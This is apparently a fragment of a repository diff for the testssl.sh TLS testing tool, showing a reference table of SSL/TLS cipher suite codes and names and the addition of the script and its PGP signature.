<tr><td> [0x2f]</td><td> AES128-SHA </td><td> RSA </td><td> AES </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x30]</td><td> DH-DSS-AES128-SHA </td><td> DH/DSS </td><td> AES </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x31]</td><td> DH-RSA-AES128-SHA </td><td> DH/RSA </td><td> AES </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x32]</td><td> DHE-DSS-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x33]</td><td> DHE-RSA-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x34]</td><td> ADH-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x35]</td><td> AES256-SHA </td><td> RSA </td><td> AES </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x36]</td><td> DH-DSS-AES256-SHA </td><td> DH/DSS </td><td> AES </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x37]</td><td> DH-RSA-AES256-SHA </td><td> DH/RSA </td><td> AES </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x38]</td><td> DHE-DSS-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x39]</td><td> DHE-RSA-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x3a]</td><td> ADH-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x3b]</td><td> NULL-SHA256 </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_SHA256 </td></tr>
<tr><td> [0x3c]</td><td> AES128-SHA256 </td><td> RSA </td><td> AES </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x3d]</td><td> AES256-SHA256 </td><td> RSA </td><td> AES </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x3e]</td><td> DH-DSS-AES128-SHA256 </td><td> DH/DSS </td><td> AES </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x3f]</td><td> DH-RSA-AES128-SHA256 </td><td> DH/RSA </td><td> AES </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x40]</td><td> DHE-DSS-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x41]</td><td> CAMELLIA128-SHA </td><td> RSA </td><td> Camellia</td><td> 128 </td><td> TLS_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x42]</td><td> DH-DSS-CAMELLIA128-SHA </td><td> DH/DSS </td><td> Camellia</td><td> 128 </td><td> TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x43]</td><td> DH-RSA-CAMELLIA128-SHA </td><td> DH/RSA </td><td> Camellia</td><td> 128 </td><td> TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x44]</td><td> DHE-DSS-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x45]</td><td> DHE-RSA-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x46]</td><td> ADH-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA </td></tr>
<tr><td> [0x62]</td><td> EXP1024-DES-CBC-SHA </td><td> RSA(1024)</td><td> DES </td><td> 56, export </td><td> TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA</td></tr>
<tr><td> [0x63]</td><td> EXP1024-DHE-DSS-DES-CBC-SHA </td><td> DH(1024) </td><td> DES </td><td> 56, export </td><td> TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA</td></tr>
<tr><td> [0x64]</td><td> EXP1024-RC4-SHA </td><td> RSA(1024)</td><td> RC4 </td><td> 56, export </td><td> TLS_RSA_EXPORT1024_WITH_RC4_56_SHA</td></tr>
<tr><td> [0x65]</td><td> EXP1024-DHE-DSS-RC4-SHA </td><td> DH(1024) </td><td> RC4 </td><td> 56, export </td><td> TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA</td></tr>
<tr><td> [0x66]</td><td> DHE-DSS-RC4-SHA </td><td> DH </td><td> RC4 </td><td> 128 </td><td> TLS_DHE_DSS_WITH_RC4_128_SHA</td></tr>
<tr><td> [0x67]</td><td> DHE-RSA-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x68]</td><td> DH-DSS-AES256-SHA256 </td><td> DH/DSS </td><td> AES </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x69]</td><td> DH-RSA-AES256-SHA256 </td><td> DH/RSA </td><td> AES </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x6a]</td><td> DHE-DSS-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x6b]</td><td> DHE-RSA-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x6c]</td><td> ADH-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0x6d]</td><td> ADH-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_CBC_SHA256 </td></tr>
<tr><td> [0x80]</td><td> GOST94-GOST89-GOST89 </td><td> unknown </td><td> unknown </td><td> unknown </td><td> TLS_GOSTR341094_WITH_28147_CNT_IMIT </td></tr>
<tr><td> [0x81]</td><td> GOST2001-GOST89-GOST89 </td><td> unknown </td><td> unknown </td><td> unknown </td><td> TLS_GOSTR341001_WITH_28147_CNT_IMIT</td></tr>
<tr><td> [0x84]</td><td> CAMELLIA256-SHA </td><td> RSA </td><td> Camellia</td><td> 256 </td><td> TLS_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x85]</td><td> DH-DSS-CAMELLIA256-SHA </td><td> DH/DSS </td><td> Camellia</td><td> 256 </td><td> TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x86]</td><td> DH-RSA-CAMELLIA256-SHA </td><td> DH/RSA </td><td> Camellia</td><td> 256 </td><td> TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x87]</td><td> DHE-DSS-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x88]</td><td> DHE-RSA-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x89]</td><td> ADH-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA </td></tr>
<tr><td> [0x8a]</td><td> PSK-RC4-SHA </td><td> PSK </td><td> RC4 </td><td> 128 </td><td> TLS_PSK_WITH_RC4_128_SHA </td></tr>
<tr><td> [0x8b]</td><td> PSK-3DES-EDE-CBC-SHA </td><td> PSK </td><td> 3DES </td><td> 168 </td><td> TLS_PSK_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x8c]</td><td> PSK-AES128-CBC-SHA </td><td> PSK </td><td> AES </td><td> 128 </td><td> TLS_PSK_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0x8d]</td><td> PSK-AES256-CBC-SHA </td><td> PSK </td><td> AES </td><td> 256 </td><td> TLS_PSK_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0x96]</td><td> SEED-SHA </td><td> RSA </td><td> SEED </td><td> 128 </td><td> TLS_RSA_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x97]</td><td> DH-DSS-SEED-SHA </td><td> DH/DSS </td><td> SEED </td><td> 128 </td><td> TLS_DH_DSS_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x98]</td><td> DH-RSA-SEED-SHA </td><td> DH/RSA </td><td> SEED </td><td> 128 </td><td> TLS_DH_RSA_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x99]</td><td> DHE-DSS-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DHE_DSS_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x9a]</td><td> DHE-RSA-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DHE_RSA_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x9b]</td><td> ADH-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DH_anon_WITH_SEED_CBC_SHA </td></tr>
<tr><td> [0x9c]</td><td> AES128-GCM-SHA256 </td><td> RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0x9d]</td><td> AES256-GCM-SHA384 </td><td> RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0x9e]</td><td> DHE-RSA-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0x9f]</td><td> DHE-RSA-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xa0]</td><td> DH-RSA-AES128-GCM-SHA256 </td><td> DH/RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xa1]</td><td> DH-RSA-AES256-GCM-SHA384 </td><td> DH/RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xa2]</td><td> DHE-DSS-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xa3]</td><td> DHE-DSS-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xa4]</td><td> DH-DSS-AES128-GCM-SHA256 </td><td> DH/DSS </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xa5]</td><td> DH-DSS-AES256-GCM-SHA384 </td><td> DH/DSS </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xa6]</td><td> ADH-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xa7]</td><td> ADH-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xc001]</td><td> ECDH-ECDSA-NULL-SHA </td><td> ECDH/ECDSA</td><td> None </td><td> None </td><td> TLS_ECDH_ECDSA_WITH_NULL_SHA </td></tr>
<tr><td> [0xc002]</td><td> ECDH-ECDSA-RC4-SHA </td><td> ECDH/ECDSA</td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_RC4_128_SHA </td></tr>
<tr><td> [0xc003]</td><td> ECDH-ECDSA-DES-CBC3-SHA </td><td> ECDH/ECDSA</td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc004]</td><td> ECDH-ECDSA-AES128-SHA </td><td> ECDH/ECDSA</td><td> AES </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc005]</td><td> ECDH-ECDSA-AES256-SHA </td><td> ECDH/ECDSA</td><td> AES </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc006]</td><td> ECDHE-ECDSA-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDHE_ECDSA_WITH_NULL_SHA </td></tr>
<tr><td> [0xc007]</td><td> ECDHE-ECDSA-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_RC4_128_SHA </td></tr>
<tr><td> [0xc008]</td><td> ECDHE-ECDSA-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc009]</td><td> ECDHE-ECDSA-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc00a]</td><td> ECDHE-ECDSA-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc00b]</td><td> ECDH-RSA-NULL-SHA </td><td> ECDH/RSA </td><td> None </td><td> None </td><td> TLS_ECDH_RSA_WITH_NULL_SHA </td></tr>
<tr><td> [0xc00c]</td><td> ECDH-RSA-RC4-SHA </td><td> ECDH/RSA </td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_RC4_128_SHA </td></tr>
<tr><td> [0xc00d]</td><td> ECDH-RSA-DES-CBC3-SHA </td><td> ECDH/RSA </td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc00e]</td><td> ECDH-RSA-AES128-SHA </td><td> ECDH/RSA </td><td> AES </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc00f]</td><td> ECDH-RSA-AES256-SHA </td><td> ECDH/RSA </td><td> AES </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc010]</td><td> ECDHE-RSA-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDHE_RSA_WITH_NULL_SHA </td></tr>
<tr><td> [0xc011]</td><td> ECDHE-RSA-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_RC4_128_SHA </td></tr>
<tr><td> [0xc012]</td><td> ECDHE-RSA-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc013]</td><td> ECDHE-RSA-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc014]</td><td> ECDHE-RSA-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc015]</td><td> AECDH-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDH_anon_WITH_NULL_SHA </td></tr>
<tr><td> [0xc016]</td><td> AECDH-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_anon_WITH_RC4_128_SHA </td></tr>
<tr><td> [0xc017]</td><td> AECDH-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc018]</td><td> AECDH-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDH_anon_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc019]</td><td> AECDH-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDH_anon_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc01a]</td><td> SRP-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc01b]</td><td> SRP-RSA-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc01c]</td><td> SRP-DSS-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0xc01d]</td><td> SRP-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc01e]</td><td> SRP-RSA-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc01f]</td><td> SRP-DSS-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA </td></tr>
<tr><td> [0xc020]</td><td> SRP-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc021]</td><td> SRP-RSA-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc022]</td><td> SRP-DSS-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA </td></tr>
<tr><td> [0xc023]</td><td> ECDHE-ECDSA-AES128-SHA256 </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0xc024]</td><td> ECDHE-ECDSA-AES256-SHA384 </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 </td></tr>
<tr><td> [0xc025]</td><td> ECDH-ECDSA-AES128-SHA256 </td><td> ECDH/ECDSA</td><td> AES </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0xc026]</td><td> ECDH-ECDSA-AES256-SHA384 </td><td> ECDH/ECDSA</td><td> AES </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 </td></tr>
<tr><td> [0xc027]</td><td> ECDHE-RSA-AES128-SHA256 </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0xc028]</td><td> ECDHE-RSA-AES256-SHA384 </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 </td></tr>
<tr><td> [0xc029]</td><td> ECDH-RSA-AES128-SHA256 </td><td> ECDH/RSA </td><td> AES </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
<tr><td> [0xc02a]</td><td> ECDH-RSA-AES256-SHA384 </td><td> ECDH/RSA </td><td> AES </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 </td></tr>
<tr><td> [0xc02b]</td><td> ECDHE-ECDSA-AES128-GCM-SHA256</td><td> ECDH </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xc02c]</td><td> ECDHE-ECDSA-AES256-GCM-SHA384</td><td> ECDH </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xc02d]</td><td> ECDH-ECDSA-AES128-GCM-SHA256 </td><td> ECDH/ECDSA</td><td> AESGCM </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xc02e]</td><td> ECDH-ECDSA-AES256-GCM-SHA384 </td><td> ECDH/ECDSA</td><td> AESGCM </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xc02f]</td><td> ECDHE-RSA-AES128-GCM-SHA256 </td><td> ECDH </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xc030]</td><td> ECDHE-RSA-AES256-GCM-SHA384 </td><td> ECDH </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xc031]</td><td> ECDH-RSA-AES128-GCM-SHA256 </td><td> ECDH/RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
<tr><td> [0xc032]</td><td> ECDH-RSA-AES256-GCM-SHA384 </td><td> ECDH/RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
<tr><td> [0xcc13]</td><td> ECDHE-RSA-CHACHA20-POLY1305 </td><td> ECDH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
<tr><td> [0xcc14]</td><td> ECDHE-ECDSA-CHACHA20-POLY1305</td><td> ECDH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
<tr><td> [0xcc15]</td><td> DHE-RSA-CHACHA20-POLY1305 </td><td> DH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
<tr><td> [0xff00]</td><td> GOST-MD5 </td><td> RSA </td><td> unknown </td><td> unknown</td></tr>
<tr><td> [0xff01]</td><td> GOST-GOST94 </td><td> RSA </td><td> unknown </td><td> unknown</td></tr>
<tr><td> [0x010080]</td><td> RC4-MD5 </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> SSL_CK_RC4_128_WITH_MD5 </td></tr>
<tr><td> [0x020080]</td><td> EXP-RC4-MD5 </td><td> RSA(512) </td><td> RC4 </td><td> 40, export </td><td> SSL_CK_RC4_128_EXPORT40_WITH_MD5 </td></tr>
<tr><td> [0x030080]</td><td> RC2-CBC-MD5 </td><td> RSA </td><td> RC2 </td><td> 128 </td><td> SSL_CK_RC2_128_CBC_WITH_MD5 </td></tr>
<tr><td> [0x040080]</td><td> EXP-RC2-CBC-MD5 </td><td> RSA(512) </td><td> RC2 </td><td> 40, export </td><td> SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5</td></tr>
<tr><td> [0x050080]</td><td> IDEA-CBC-MD5 </td><td> RSA </td><td> IDEA </td><td> 128 </td><td> SSL_CK_IDEA_128_CBC_WITH_MD5 </td></tr>
<tr><td> [0x060040]</td><td> DES-CBC-MD5 </td><td> RSA </td><td> DES </td><td> 56 </td><td> SSL_CK_DES_64_CBC_WITH_MD5 </td></tr>
<tr><td> [0x0700c0]</td><td> DES-CBC3-MD5 </td><td> RSA </td><td> 3DES </td><td> 168 </td><td> SSL_CK_DES_192_EDE3_CBC_WITH_MD5 </td></tr>
<tr><td> [0x080080]</td><td> RC4-64-MD5 </td><td> RSA </td><td> RC4 </td><td> 64 </td><td> SSL_CK_RC4_64_WITH_MD5 </td></tr>
</table>
</body>

1680
testssl.sh Executable file
View File

File diff suppressed because it is too large Load Diff

7
testssl.sh.asc Normal file
View File

@ -0,0 +1,7 @@
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iD8DBQBTnflQWZzt6LgYwDkRAvPjAJ0eVYoPO6we7rnD1stNFp4AbPLXTQCgq+75
r27Xry6XPYtZq/kur4NR4Pw=
=nECU
-----END PGP SIGNATURE-----